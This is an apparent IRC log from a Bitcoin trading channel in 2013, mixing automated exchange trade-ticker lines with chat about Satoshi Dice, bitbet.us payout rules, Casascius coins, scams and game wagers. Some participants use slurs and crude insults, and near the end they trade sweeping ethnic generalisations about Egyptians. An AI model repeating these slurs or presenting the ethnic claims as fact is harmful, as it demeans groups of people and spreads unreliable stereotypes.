is looking better this month Apr 22 14:27:27 that's good news Apr 22 14:27:49 https://bitcointalk.org/index.php?topic=80312.msg1906329#msg1906329 Apr 22 14:28:17 the bet volume isnt too good Apr 22 14:28:34 the higher value of BTC Apr 22 14:28:39 the lower the volume that will be bet Apr 22 14:29:05 yeah I love this dooglus guy Apr 22 14:29:17 the argument against that was.. as btc price grows, more people use them.. and more play on s.dice Apr 22 14:29:21 he must really be into statistics :) Apr 22 14:29:39 dooglus.. he played satoshi dice before Apr 22 14:29:44 about 600 dollars bet Apr 22 14:29:54 back then when btc was single to double digits Apr 22 14:30:10 I've done my bets as well Apr 22 14:30:15 and won very well Apr 22 14:30:17 then quit Apr 22 14:30:24 wise decision Apr 22 14:30:27 and bought shares in the house Apr 22 14:30:36 since the house always wins, so I thougth :) Apr 22 14:30:38 hah. thats how riches are made Apr 22 14:31:07 I hope… :) Apr 22 14:31:42 but I like Erik as well, I trust he'll come up with something to revive SD Apr 22 14:32:12 ev speaks well, always impresses me how he communicates on air. Apr 22 14:32:29 yup a very good advocate for Bitcoin Apr 22 14:33:13 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [+] Apr 22 14:33:34 no ones taking me up on my offer. are the odds too low? Apr 22 14:34:08 nobody wants to buy the game for a chance to lose to you. Apr 22 14:34:11 methinks Apr 22 14:34:30 plus it's time for work. ;) Apr 22 14:34:39 deadweasel is right :) Apr 22 14:35:12 i wonder... Apr 22 14:35:26 are there any charts or order books that account for OTC? Apr 22 14:35:38 there is a 6000 coin sell at ~123 Apr 22 14:35:48 and a 8000 coin buy at 125 Apr 22 14:35:51 well confession bear here.. I think the odds are 99.9% in my favour lol Apr 22 14:36:43 ah you're just here to elate your ego :) Apr 22 14:36:48 and we're too pussy to prove you wrong Apr 22 14:37:00 nah. i want some btc. :3 Apr 22 14:37:19 MJR_ prolly something you can make. not so hard to query the book Apr 22 14:37:20 Thinking of offering a free game if... they deposit at least 1 btc to john Apr 22 14:37:24 There is a risk for me.. Apr 22 14:37:35 if someone out there in an A ranker, I'd get destroyed Apr 22 14:37:40 well, i would like to make $12000 on one order... Apr 22 14:38:43 [BTCTC] [B.YABMC] 7 @ 0.01498 = 0.1049 BTC [+] Apr 22 14:40:06 rock, paper ... scissors ? How can you be an A ranker in that over the net ? Apr 22 14:46:36 punches beat throws, throws beat blocks and blocks beat punches Apr 22 14:47:24 bowjob: offer to buy them the game if they deposit 1 btc Apr 22 14:47:49 rock paper scissors system. its a game where you beat your opponents using those moves, Apr 22 14:47:56 Yes, I'm thinking about it Apr 22 14:48:30 I still need to talk to john about this, he can be my escrow Apr 22 14:55:09 I'm still brainstorming rules, taking into account for latency Apr 22 14:55:13 There, done. Apr 22 14:55:19 Taking any and all challengers Apr 22 15:00:19 [MPEX] [S.DICE] 5946 @ 0.00326035 = 19.386 BTC [+] Apr 22 15:02:39 [BTCTC] [S.DICE-PT] 5 @ 0.00367 = 0.0184 BTC [-] Apr 22 15:04:16 [BTCTC] [S.DICE-PT] 1 @ 0.0036 BTC [-] Apr 22 15:05:11 [BTCTC] [S.DICE-PT] 10 @ 0.0032 = 0.032 BTC [-] Apr 22 15:05:27 [BTCTC] [S.DICE-PT] 30 @ 0.0031 = 0.093 BTC [-] Apr 22 15:08:48 [MPEX] [S.MPOE] 9633 @ 0.00070857 = 6.8257 BTC [+] Apr 22 15:08:50 [MPEX] [S.MPOE] 2476 @ 0.00070989 = 1.7577 BTC [+] Apr 22 15:09:03 [HAVELOCK] [SDICE] 3 @ 0.29639998 = 0.8892 BTC [+] Apr 22 15:09:04 [HAVELOCK] [SDICE] 1 @ 0.29639999 BTC [+] Apr 22 15:11:03 [HAVELOCK] [SDICE] 3 @ 0.29639999 = 0.8892 BTC [+] Apr 22 15:11:12 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19989 BTC [+] Apr 22 15:12:00 [BTCTC] [ASICMINER-PT] 3 @ 1.11 = 3.33 BTC [-] Apr 22 15:12:04 [HAVELOCK] [SDICE] 10 @ 0.296499 = 2.965 BTC [+] Apr 22 15:13:03 [HAVELOCK] [SDICE] 5 @ 0.296499 = 1.4825 BTC [+] Apr 22 15:15:04 [HAVELOCK] [SDICE] 1 @ 0.296499 BTC [+] Apr 22 15:18:08 https://bitcointalk.org/index.php?topic=183044.msg1910142#msg1910142 Apr 22 15:18:11 updated. Apr 22 15:18:16 anything else should I include? Apr 22 15:28:31 [BTCTC] [CRYPTO-TRADE] 2 @ 0.19989 = 0.3998 BTC [+] Apr 22 15:32:03 sure Apr 22 15:32:06 u got the game alreayd? Apr 22 15:32:41 heck we can go old school if you want. Apr 22 15:32:50 play SF2. its a game older than me Apr 22 15:32:52 :) Apr 22 15:33:24 any proposals? Apr 22 15:33:43 id love to get my hands on skullgirls, but they are not out yet Apr 22 15:34:26 isn't it out for ps3 Apr 22 15:34:33 it is, but not for pc Apr 22 15:34:59 http://publicshaming.tumblr.com/post/48547675807/the-definitive-people-who-thought-chechnya-was-the Apr 22 15:35:04 a nice wall of ameritards Apr 22 15:36:09 im watching th rules Apr 22 15:42:24 [BTCTC] [B.YABMC] 9 @ 0.013 = 0.117 BTC [-] Apr 22 15:42:27 [BTCTC] [B.YABMC] 8 @ 0.0126 = 0.1008 BTC [-] Apr 22 15:42:30 [BTCTC] [B.YABMC] 4 @ 0.0125 = 0.05 BTC [-] Apr 22 15:42:33 [BTCTC] [B.YABMC] 17 @ 0.012 = 0.204 BTC [-] Apr 22 15:45:46 you gave me an idea Apr 22 15:45:52 OMG fuckin bitstamp idiots Apr 22 15:46:08 they cant even figure out whats wrong with their website / "exchange" / toilet hole Apr 22 15:46:10 I added a second game to play Apr 22 15:46:10 https://bitcointalk.org/index.php?topic=183044.msg1910142#msg1910142 Apr 22 15:46:37 I;m thinking 1:1 on team fortress as well, but its not fit for a 1v1 game. Apr 22 15:47:29 nah Apr 22 15:47:50 the game is too rigid for me Apr 22 15:47:53 yeah Apr 22 15:47:59 Great! Apr 22 15:48:04 <= likes chess... Apr 22 15:48:22 i still have to learn the basic strats for it Apr 22 15:48:27 i know the moves, ect Apr 22 15:48:27 I've actually coded a chess engine once... Apr 22 15:48:49 but it's quite poor.. Apr 22 15:49:32 oh wow. they have a surgeon simulator videogame Apr 22 15:49:33 lol Apr 22 15:50:37 wait i quit the vid miday Apr 22 15:50:39 midway Apr 22 15:50:40 lol Apr 22 15:50:54 perhaps later. its bedtime for me now, its 5:50 AM Apr 22 15:50:57 >_> Apr 22 15:51:24 oh...2:51 pm here... Apr 22 15:53:25 truffles, game of tactics arena? Apr 22 15:53:26 :3 Apr 22 15:53:33 no btcs, consider it a warmup Apr 22 15:53:44 [BTCTC] [ASICMINER-PT] 2 @ 1.104 = 2.208 BTC [-] Apr 22 15:53:47 [BTCTC] [ASICMINER-PT] 1 @ 1.103001 BTC [-] Apr 22 15:53:50 [BTCTC] [ASICMINER-PT] 1 @ 1.103 BTC [-] Apr 22 15:53:53 [BTCTC] [ASICMINER-PT] 1 @ 1.102 BTC [-] Apr 22 15:53:55 [BTCTC] [ASICMINER-PT] 1 @ 1.10001 BTC [-] Apr 22 15:53:58 http://www.tacticsarena.com/play/ Apr 22 15:53:58 [BTCTC] [ASICMINER-PT] 6 @ 1.07 = 6.42 BTC [-] Apr 22 15:54:04 ill wait for u on banff server Apr 22 15:54:40 im here now Apr 22 15:54:51 turn based strategy Apr 22 15:55:20 k, the game randomly picks who moves first Apr 22 15:55:37 i pick my move, then ur turn. the goal is you kill more of my guys than you kill of me Apr 22 15:57:47 u playin? Apr 22 15:57:53 im in banff Apr 22 15:58:01 aye Apr 22 15:58:05 [HAVELOCK] [SDICE] 4 @ 0.296499 = 1.186 BTC [+] Apr 22 15:58:07 [HAVELOCK] [SDICE] 76 @ 0.2965 = 22.534 BTC [+] Apr 22 16:00:24 yeap Apr 22 16:00:28 wanna go at it? Apr 22 16:00:46 floor 7 Apr 22 16:00:50 wait lemme set up Apr 22 16:00:59 my guys. u can chang etheir beginning stances Apr 22 16:02:19 ready Apr 22 16:03:15 https://btc.sx/?tab=signup Apr 22 16:03:20 somebody alpha testing this. Apr 22 16:03:57 user Sealy in bitcoin-analysis... interesting. Apr 22 16:04:49 enter Apr 22 16:19:32 [BTCTC] [S.DICE-PT] 53 @ 0.003679 = 0.195 BTC [+] Apr 22 16:21:56 [BTCTC] [BITVPS] 1 @ 0.00209 BTC [-] Apr 22 16:26:38 this one is new to me http://i.imgur.com/vlKihqr.jpg Apr 22 16:29:04 [BTCTC] [ASICMINER-PT] 1 @ 1.19999 BTC [+] Apr 22 16:30:00 would anyone be interested in rare pockies Apr 22 16:40:46 [BTCTC] [ASICMINER-PT] 1 @ 1.1999 BTC [-] Apr 22 16:41:13 [BTCTC] [ASICMINER-PT] 3 @ 1.2 = 3.6 BTC [+] Apr 22 16:41:29 [BTCTC] [ASICMINER-PT] 6 @ 1.2 = 7.2 BTC [+] Apr 22 16:41:56 [BTCTC] [ASICMINER-PT] 5 @ 1.22 = 6.1 BTC [+] Apr 22 16:44:05 [HAVELOCK] [VTX] 1 @ 0.4699 BTC [-] Apr 22 16:44:06 [HAVELOCK] [VTX] 20 @ 0.47 = 9.4 BTC [+] Apr 22 16:46:02 [BTCTC] [ASICMINER-PT] 8 @ 1.225 = 9.8 BTC [+] Apr 22 16:50:12 [BTCTC] [ASICMINER-PT] 1 @ 1.189 BTC [-] Apr 22 16:54:00 how do i quote prices in btc Apr 22 16:55:26 "prices in btc" Apr 22 16:55:46 [MPEX] [S.MPOE] 13251 @ 0.00070989 = 9.4068 BTC [+] Apr 22 16:56:16 i saw people price things in btc Apr 22 16:56:24 and it adjusts it automatically for them Apr 22 16:56:28 pegging it to fiat Apr 22 16:57:24 find such person Apr 22 16:57:32 click on image -> open in new window Apr 22 16:57:43 copy url and replace btc value Apr 22 16:58:09 [BTCTC] [S.DICE-PT] 20 @ 0.00301 = 0.0602 BTC [-] Apr 22 17:00:20 (provided that you're talking about the forum) Apr 22 17:01:24 [BTCTC] [S.MPOE-PT] 200 @ 0.000679 = 0.1358 BTC [-] Apr 22 17:05:16 https://bitcointalk.org/index.php?topic=183130.msg1911279#msg1911279 Apr 22 17:05:17 there Apr 22 17:05:20 I dunnit Apr 22 17:09:30 poca sweat ? Apr 22 17:12:14 they have "pocari sweat" around here. Apr 22 17:12:22 [BTCTC] [S.MPOE-PT] 150 @ 0.000693 = 0.104 BTC [+] Apr 22 17:12:32 some ghastly named gatorade equivalent. Apr 22 17:12:32 I had one when I was in Japan last week heh Apr 22 17:13:09 do you have some "lalala piss" too? Apr 22 17:19:17 [BTCTC] [ASICMINER-PT] 1 @ 1.11 BTC [-] Apr 22 17:19:19 [BTCTC] [ASICMINER-PT] 1 @ 1.10102 BTC [-] Apr 22 17:19:25 [BTCTC] [ASICMINER-PT] 1 @ 1.10101 BTC [-] Apr 22 17:19:28 [BTCTC] [ASICMINER-PT] 1 @ 1.101 BTC [-] Apr 22 17:19:31 [BTCTC] [ASICMINER-PT] 1 @ 1.09103 BTC [-] Apr 22 17:19:40 [BTCTC] [ASICMINER-PT] 1 @ 1.09102 BTC [-] Apr 22 17:19:47 [BTCTC] [ASICMINER-PT] 1 @ 1.091 BTC [-] Apr 22 17:19:50 [BTCTC] [ASICMINER-PT] 7 @ 1.09 = 7.63 BTC [-] Apr 22 17:22:48 [MPEX] [S.MPOE] 12700 @ 0.00070087 = 8.901 BTC [-] Apr 22 17:22:50 [MPEX] [S.MPOE] 10550 @ 0.00069911 = 7.3756 BTC [-] Apr 22 17:26:37 http://www.youtube.com/watch?v=CwpksY1Sj64 Apr 22 17:26:38 AHAHAHAH Apr 22 17:27:48 fucking crazy russians Apr 22 17:41:11 [BTCTC] [BITVPS] 30 @ 0.002 = 0.06 BTC [-] Apr 22 17:42:21 http://forexmagnates.com/bitcoin-exchange-trading-platform-coming-soon-rtbtc-flashes-specs/ Apr 22 17:49:15 mircea_popescu: For bitbet.us, the weight is for a 1 BTC bet I assume (i.e. proportional to size)? I might have missed something but this doesn't seem to be explained in the FAQ. Apr 22 18:05:43 zebedee_ i'm not sure how you mean ? the weight is just a factor. Apr 22 18:07:11 kakobrekla forexmagnates ? Apr 22 18:11:13 http://pastebin.com/2DWe3qci Apr 22 18:11:36 only 20 minutes until debork's sham :) Apr 22 18:11:58 he made it up for fun, methinks Apr 22 18:15:59 mircea_popescu: Right, so my total weight if I bet 2 BTC is twice what it is if I bet 1 BTC? Apr 22 18:16:06 yep Apr 22 18:16:15 Although it may be obvious, I don't believe that's explicit anywhere. Apr 22 18:16:22 so i get what you ask now. yes it's per btc in the sense gravity is per kilogram. Apr 22 18:16:30 not per 1 btc specifically, just, as a factor. Apr 22 18:16:58 But if I bet 1 BTC I get that weight? That makes it per BTC. Apr 22 18:16:59 http://www.pymnts.com/briefing-room/prepaid/gift-cards/2013/blackhawk-completes-230-million-ipo/ Apr 22 18:17:06 so blackhawk is valued at 1.3bn. Apr 22 18:17:17 by this comparison satoshi dice is 99% undervalued. Apr 22 18:17:39 zebedee_ you get that weight no matter what you bet. it's your bet * that weight. Apr 22 18:17:56 http://bitbet.us/faq/#14 Apr 22 18:18:00 Right. Apr 22 18:18:03 i think that pretty much says it, wouldn't you say ? Apr 22 18:18:25 I'm a mathemetician, I like precision :) Apr 22 18:18:43 None of this BFL vague bet shit. Apr 22 18:19:49 haha good, but specifically : Apr 22 18:20:02 Every bettor on the winning side will receive as follows : 99% of his original bet sum (1% goes to BitBet.us) plus 99% of his bet times the total bet by the losing side multiplied by the winning side total weight and divided by his bet's total weight. Apr 22 18:20:04 no good ? Apr 22 18:20:39 [BTCTC] [ASICMINER-PT] 1 @ 1.18886 BTC [+] Apr 22 18:20:54 [BTCTC] [ASICMINER-PT] 1 @ 1.18888 BTC [+] Apr 22 18:20:59 [BTCTC] [ASICMINER-PT] 1 @ 1.189 BTC [+] Apr 22 18:21:07 mircea_popescu: No I think you're right, thanks. Apr 22 18:21:09 [BTCTC] [ASICMINER-PT] 1 @ 1.192 BTC [+] Apr 22 18:21:13 np np Apr 22 18:21:44 [BTCTC] [ASICMINER-PT] 1 @ 1.18887 BTC [-] Apr 22 18:21:49 [MPEX] [S.MPOE] 1450 @ 0.00069911 = 1.0137 BTC [-] Apr 22 18:21:50 [MPEX] [S.MPOE] 6950 @ 0.0006972 = 4.8455 BTC [-] Apr 22 18:21:57 One more: what is your policy for bets which are determined before they expire? e.g. suppose it's a bet about BTC going above X USD by end 2013 and it happens tomorrow. Do you pay out tomorrow, or what? Apr 22 18:22:45 there's two loose cases here. if the stated resolution is far off (ie, more than a week), and the bet is clearly satisfied then the bet is paid off now. Apr 22 18:23:03 if the stated resolution is close the bet is resolved now or then, depending on load. Apr 22 18:23:22 there are however bets which only resolve on their stated date, regardless. this is obvious from the wording Apr 22 18:23:31 OK because people can game that if they bet just as, or immediately after, it's "happened". Apr 22 18:23:31 (such as the avalon delivery bet was) Apr 22 18:23:50 zebedee_ no, for two reasons. one is that bets coming in after the fact are refunded Apr 22 18:24:00 if you look you will ocasionalyl see "refund" on the bet list. Apr 22 18:24:18 furthermore, trying to game it this way exposes you to the following risk : if your bet doesn't make it into a block before bet is closed Apr 22 18:24:20 you lose it. Apr 22 18:24:28 so few people actually try to game it this way. Apr 22 18:24:29 OK, that seems good. Apr 22 18:24:51 Thanks. I'm curious - how do you handle your wallet?Do you pregenerate thousands of addresses in and store them in a DB somewhere? Apr 22 18:25:16 all i'm going to say is that bitbet server holds less than 10 btc at all times. Apr 22 18:26:09 Sure. Just was curious about the tech of the offline wallet, as I've been dealing with such issues in a personal capacity myself. If you don't want to say anything fair enough, though I don't really see what risk that might expose you to. Apr 22 18:27:06 [HAVELOCK] [SDICE] 10 @ 0.29649999 = 2.965 BTC [-] Apr 22 18:27:47 not risk per se, just, bitbet is a valuable business publicly owned, its internals may be discussed up to a certain - arbitrary - point. Apr 22 18:28:06 [HAVELOCK] [SDICE] 4 @ 0.296499 = 1.186 BTC [-] Apr 22 18:28:36 OK. What do you do personally if you don't mind my asking?Which client do you use, or do you do your own thing with private keys etc? Apr 22 18:28:55 i have a heavily modified bitcoind Apr 22 18:29:04 [HAVELOCK] [SDICE] 1 @ 0.2964 BTC [-] Apr 22 18:29:10 this is pretty much what i do in general, my blog is a heavily modified wp etc Apr 22 18:29:22 basically my tech ppl pick up some open software and rewrite it. Apr 22 18:29:22 OK, thanks. I used to use offline electrum but have moved to paper wallets a-la casascius. Apr 22 18:29:52 anyway, you hatching some service ? Apr 22 18:30:37 No. Writing my own bitcoin stuff in C though, but just for fun and to understand it better. Apr 22 18:30:37 zebedee_: do you know any casascius resellers Apr 22 18:30:44 shits are hard to find Apr 22 18:30:50 zebedee_ it's how good services are started. Apr 22 18:30:56 thestringpuller: me, perhaps. What are you looking for? :) Apr 22 18:32:15 I bought about 30-40 version ones, with the bad hologram. Gave all away apart from 3, when I saw what they were going for :) Apr 22 18:32:20 And I have more version twos. Apr 22 18:33:26 Trying to think of devious ways to swap a version 2 for a version 1 with the people I gave them away to :) Apr 22 18:33:51 lmao Apr 22 18:33:58 what are you, an indian giver ? Apr 22 18:35:05 Not sure what that is. Just thought it was a cool way to introduce btc to people. Only gave them to people who have added value to my life in some way or other. Apr 22 18:35:38 indian giver = person who gives then tries to get it back :D Apr 22 18:35:52 Ah :) Apr 22 18:36:18 Anyway, gotta sleep. Apr 22 18:43:20 query thickasthieves Apr 22 18:56:07 [BTCTC] [GSDPT] 1 @ 0.0038 BTC [-] Apr 22 18:57:05 [HAVELOCK] [SDICE] 1 @ 0.2792 BTC [-] Apr 22 18:58:15 thestringpuller, molecular does resell Apr 22 18:58:30 but last i heard is out of stock and need wait a month Apr 22 19:02:59 [BTCTC] [GSDPT] 24 @ 0.0038 = 0.0912 BTC [-] Apr 22 19:09:14 [BTCTC] [PAJKA.BOND] 1 @ 0.0975 BTC [+] Apr 22 19:31:20 [BTCTC] [ASICMINER-PT] 1 @ 1.16 BTC [-] Apr 22 19:32:17 [BTCTC] [ASICMINER-PT] 1 @ 1.155012 BTC [-] Apr 22 19:32:59 [BTCTC] [ASICMINER-PT] 1 @ 1.155011 BTC [-] Apr 22 19:33:50 [BTCTC] [ASICMINER-PT] 1 @ 1.15501 BTC [-] Apr 22 19:35:45 [BTCTC] [ASICMINER-PT] 1 @ 1.145 BTC [-] Apr 22 19:38:36 [BTCTC] [COGNITIVE] 1 @ 0.1831 BTC [-] Apr 22 19:39:12 [BTCTC] [ASICMINER-PT] 1 @ 1.14002 BTC [-] Apr 22 19:40:09 [BTCTC] [ASICMINER-PT] 9 @ 1.14 = 10.26 BTC [-] Apr 22 19:45:28 [BTCTC] [BASIC-MINING] 1 @ 0.429 BTC [+] Apr 22 19:52:02 [BTCTC] [BASIC-MINING] 11 @ 0.429 = 4.719 BTC [+] Apr 22 20:01:49 ugh disk failures :/ Apr 22 20:33:27 [MPEX] [S.MPOE] 7500 @ 0.00070015 = 5.2511 BTC [+] Apr 22 20:35:07 https://bitcointalk.org/index.php?topic=181662.0 this actually sounds pretty awful Apr 22 20:37:49 [BTCTC] [PAJKA.BOND] 1 @ 0.0975 BTC [+] Apr 22 20:38:29 Think how that would have gone for you MP, last month when the bot got raped Apr 22 20:38:39 and that was a real amount of money Apr 22 20:40:18 [MPEX] [S.MPOE] 11600 @ 0.00070789 = 8.2115 BTC [+] Apr 22 20:40:19 [MPEX] [S.MPOE] 547 @ 0.0006972 = 0.3814 BTC [-] Apr 22 20:40:21 [MPEX] [S.MPOE] 6741 @ 0.00069452 = 4.6818 BTC [-] Apr 22 20:41:27 jborkl_ hm how do you mean ? Apr 22 20:42:34 Well, they can not fufill orders when price crashes- shorting a order $30 - you made good on 21000 BTC Apr 22 20:42:55 [MPEX] [S.MPOE] 4494 @ 0.00068401 = 3.0739 BTC [-] Apr 22 20:52:10 >. This is the kind of one-in-a-million occurance that happens when using cutting edge systems like Bitcoin, Apr 22 20:52:12 LOL Apr 22 20:52:41 >and we're glad it happened to us instead of a normal user Apr 22 20:52:47 yet 'normal user' got harmed Apr 22 20:53:23 isnt erik with them or mixed smth up? Apr 22 20:53:42 oh no thats coinapult Apr 22 20:53:47 nvm Apr 22 20:56:59 I placed 2 orders on the 9th, one for silver one for gold. I received my silver order by the 15th. My gold order is still in processing. Orders were < 2 BTC each. I was pretty happy with receving my silver order so I gave them a rating of 2. Apr 22 20:57:48 So far I haven't had any issues or heard the anything like the guy on btctalk. Apr 22 20:58:06 [HAVELOCK] [HIM] 1 @ 1.77 BTC [+] Apr 22 20:58:08 [BTCTC] [ASICMINER-PT] 22 @ 1.14002 = 25.0804 BTC [+] Apr 22 21:00:01 jborkl_ ah i see what you mean. Apr 22 21:00:40 kakobrekla afaik erik was with bitpay team but they parted amicably Apr 22 21:00:49 and now is focusing on coinapult which is not related to coinabul. Apr 22 21:00:51 [BTCTC] [ASICMINER-PT] 1 @ 1.14001 BTC [-] Apr 22 21:00:55 [BTCTC] [ASICMINER-PT] 1 @ 1.14001 BTC [-] Apr 22 21:01:52 [BTCTC] [ASICMINER-PT] 1 @ 1.14 BTC [-] Apr 22 21:02:27 [BTCTC] [ASICMINER-PT] 2 @ 1.0912 = 2.1824 BTC [-] Apr 22 21:03:04 [BTCTC] [ASICMINER-PT] 3 @ 1.09 = 3.27 BTC [-] Apr 22 21:03:07 [BTCTC] [ASICMINER-PT] 4 @ 1.09 = 4.36 BTC [-] Apr 22 21:03:22 myeah Apr 22 21:03:27 i mixed cinabul and coinapult Apr 22 21:03:37 cina = coina Apr 22 21:04:09 i guess i have scammer ptsd from all of this bitcoin stuff. There have been some ugly public fights about stuff in the past with them. But I've been talkin to coingenuity for a long time on irc and looking at the coinabul site a lot but never made a purchse. Apr 22 21:04:12 [BTCTC] [ASICMINER-PT] 5 @ 1.0701 = 5.3505 BTC [-] Apr 22 21:04:39 I figured it was worth a try to see how it goes. So far, I'm satisfied with the service. Will let you guys know how it ends up. Apr 22 21:04:51 [BTCTC] [ASICMINER-PT] 5 @ 1.07 = 5.35 BTC [-] Apr 22 21:05:02 [BTCTC] [ASICMINER-PT] 1 @ 1.07 BTC [-] Apr 22 21:05:13 erik was with bitinstant, not bitpay, afaik... Apr 22 21:05:16 scammer ptsd lol Apr 22 21:05:19 nice way of putting it Apr 22 21:05:28 pgp o fuck yes i confused them. bitinstant it was. Apr 22 21:05:56 coinpeople bitplease stopcoin bitusing coinames bitfor everycointhing youbit coindo omfbitgod!! Apr 22 21:06:10 lol Apr 22 21:07:00 lol Apr 22 21:07:23 lol Apr 22 21:07:24 bit_chslap Apr 22 21:07:44 good one Apr 22 21:08:01 i seriously do... i've had to navigate through all of these scams since the old days. i only got scammed, so far, by tor-wallet which was idiot to use anyway. Lost like 5 BTC on them. Apr 22 21:08:59 i basically just end up hording btc since or sending them to use on MPEx since the trust level with just about everything else in this space is too great to bear. Apr 22 21:09:52 trust is hard won in the bitcoin arena... Apr 22 21:11:10 nah, all you need is a ltd really Apr 22 21:11:16 just ask stslimited Apr 22 21:11:22 oh whered he go now Apr 22 21:14:18 ok this goes to twitter too Apr 22 21:15:11 kakobrekla i imagine he's going to show us all how stoopid we really are Apr 22 21:15:26 and how the 500th iteration of a failed idea is going to yield results simply because he doesn't know of the other 499 Apr 22 21:19:34 i got sunburned from so much light exposure in last few days, just noticed im semi roasted. Apr 22 21:20:11 gotta calm the skin with lcd backlight. Apr 22 21:20:15 anyway, Apr 22 21:20:27 the guy say Apr 22 21:20:28 >If you want to be a defacto regulatory, at least come up with sensible regulations. Apr 22 21:20:36 maybe MJR_ can tell him "no skateboards" Apr 22 21:20:46 de facto regulatory my foot. Apr 22 21:21:02 this is like "you must read" being regulation. Apr 22 21:21:29 im thinking now, publishing best practices like that would only make scamzors a bit harder to detect Apr 22 21:21:33 kakobrekla timisoara > california for sun Apr 22 21:21:47 [BTCTC] [ASICMINER-PT] 1 @ 1.0603 BTC [-] Apr 22 21:21:51 [BTCTC] [ASICMINER-PT] 2 @ 1.0602 = 2.1204 BTC [-] Apr 22 21:21:54 [BTCTC] [ASICMINER-PT] 16 @ 1.0601 = 16.9616 BTC [-] Apr 22 21:21:57 [BTCTC] [ASICMINER-PT] 4 @ 1.06 = 4.24 BTC [-] Apr 22 21:21:58 kakobrekla im not sure things work that way. good scamzors are hard to detect anyway. bad ones are bad anyway Apr 22 21:23:21 ah but i heard baroquesque paleness is comming back in fashion Apr 22 21:26:07 [HAVELOCK] [SDICE] 1 @ 0.2965 BTC [+] Apr 22 21:38:15 "At any rate, I would like to humbly solicit the best and brightest minds of our generation to consider this problem" Apr 22 21:38:20 http://trilema.com/2013/i-have-a-problem-which-i-dont-know-how-to-resolve-so-do-you/ Apr 22 21:38:23 asciilifeform ^ Apr 22 21:40:22 don't see the problem Apr 22 21:40:39 well that's why Apr 22 21:41:04 [MPEX] [S.MPOE] 23198 @ 0.00068402 = 15.8679 BTC [+] Apr 22 21:41:11 so we form a non-profit for dooglas Apr 22 21:41:24 and pay him from that? Apr 22 21:41:37 we not including me Apr 22 21:42:22 then including who ? Apr 22 21:42:44 any guy who figures he can somehow elbow people into sending donations which he can then uyse as working capital for some other venture ? Apr 22 21:42:51 bs model, even more immoral than the problem. Apr 22 21:43:04 those who see value in his work should dnoate or contribute to an organization that pays him Apr 22 21:43:07 like a lobbyist Apr 22 21:43:21 he work isn't lobbied for to your liking Apr 22 21:43:41 so then those with better marketing skills will get paid Apr 22 21:43:48 i see the problem. but the irl solution is just as immoral Apr 22 21:43:50 and people doing useful shit will just get trhe added insult. Apr 22 21:43:56 much like copyrigh works currently. Apr 22 21:44:04 jcpham indeed. article even says that. Apr 22 21:44:06 [HAVELOCK] [VTX] 1 @ 0.4263 BTC [-] Apr 22 21:44:08 [HAVELOCK] [VTX] 2 @ 0.42620002 = 0.8524 BTC [-] Apr 22 21:44:09 [HAVELOCK] [VTX] 1 @ 0.426 BTC [-] Apr 22 21:44:10 [HAVELOCK] [VTX] 5 @ 0.42520001 = 2.126 BTC [-] Apr 22 21:44:11 [HAVELOCK] [VTX] 1 @ 0.4252 BTC [-] Apr 22 21:44:12 [HAVELOCK] [VTX] 5 @ 0.42511001 = 2.1256 BTC [-] Apr 22 21:44:14 [HAVELOCK] [VTX] 46 @ 0.42511 = 19.5551 BTC [-] Apr 22 21:45:07 [HAVELOCK] [SDICE] 23 @ 0.2965 = 6.8195 BTC [+] Apr 22 21:46:07 [HAVELOCK] [SDICE] 1 @ 0.2989 BTC [+] Apr 22 21:46:08 [HAVELOCK] [SDICE] 2 @ 0.299 = 0.598 BTC [+] Apr 22 21:46:09 [HAVELOCK] [SDICE] 13 @ 0.3 = 3.9 BTC [+] Apr 22 21:47:04 sticky. Apr 22 21:47:06 [HAVELOCK] [SDICE] 1 @ 0.3 BTC [+] Apr 22 21:47:08 [HAVELOCK] [SDICE] 12 @ 0.3297 = 3.9564 BTC [+] Apr 22 21:47:09 [HAVELOCK] [SDICE] 10 @ 0.32979998 = 3.298 BTC [+] Apr 22 21:47:09 very sticky indeed Apr 22 21:47:10 [HAVELOCK] [SDICE] 7 @ 0.34 = 2.38 BTC [+] Apr 22 21:48:07 [HAVELOCK] [SDICE] 1 @ 0.34 BTC [+] Apr 22 21:48:08 [HAVELOCK] [SDICE] 12 @ 0.34 = 4.08 BTC [+] Apr 22 21:48:14 keep this in mind, if you will Apr 22 21:48:36 he work that dooglas does, does it involve his opinions or is he simply formulating data Apr 22 21:48:37 exactly. Apr 22 21:49:02 jcpham he's not really giving any opinion at all, just data processing atm. Apr 22 21:49:05 if you pay him for opinion it is one thing, but paying for reporting is another Apr 22 21:49:06 but he has designed the entire process. Apr 22 21:49:16 he's designed a report Apr 22 21:49:19 which has value Apr 22 21:49:59 if he were providing a forecast or something i think it's a lot more questionable that paying for a data report Apr 22 21:51:05 suppose he makes a mistake in a future version Apr 22 21:51:12 which statistically speaking is guaranteed. Apr 22 21:52:22 well if we're talking about compensation, I wouldn't suggest paying for bad data... Apr 22 21:52:29 but ye. he fudges something Apr 22 21:52:36 what's the damage? Apr 22 21:54:14 well i dunno, forum full of ppl conspiracytheorizing Apr 22 21:55:33 i can see that but like i said, what do you value his data or his opinions Apr 22 21:55:48 the conspiracy would stem from the two of you combining your opinions Apr 22 21:55:54 not the actual data Apr 22 21:55:54 maybe that line is not always easy to draw. Apr 22 21:55:59 i agree Apr 22 21:56:04 but in your head it should be Apr 22 21:56:07 [HAVELOCK] [SDICE] 1 @ 0.28000001 BTC [-] Apr 22 21:56:10 maybe not to everyone else Apr 22 21:56:47 but his data could game you if you don't have your own fact-checkers Apr 22 22:03:29 right. Apr 22 22:04:15 http://www.quickmeme.com/meme/3u1a6b/ Apr 22 22:04:17 haha Apr 22 22:04:44 lol Apr 22 22:05:13 tho the argument is kinda misplaced. caucasian !=== white. Apr 22 22:06:00 let me check the wiki page :) Apr 22 22:06:17 Historically, the term was used for many people from these regions, without regard necessarily to skin tone. Apr 22 22:06:19 hmpf. Apr 22 22:06:47 :p Apr 22 22:07:05 this is like egypt. classically egyptians were tall, thin nosed, fair haired people. Apr 22 22:07:18 ;;NEXT Apr 22 22:07:19 \*AWAY UNTIL April 28\* resistance: 132, 136, 138-140 | support: 120, 115, 110, 100, 90 | lower buy targets: 102, 96-100, 86 | updated by OneFixt at Apr 21 2013, 18:00 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 1 day, 1 hour, 7 minutes, and 12 seconds ago Apr 22 22:07:20 current day egyptians are turkish stock (short, stocky, black curly hair) Apr 22 22:07:21 etc. Apr 22 22:07:50 yeah, but anyway Apr 22 22:08:01 guys were american citizens anyway Apr 22 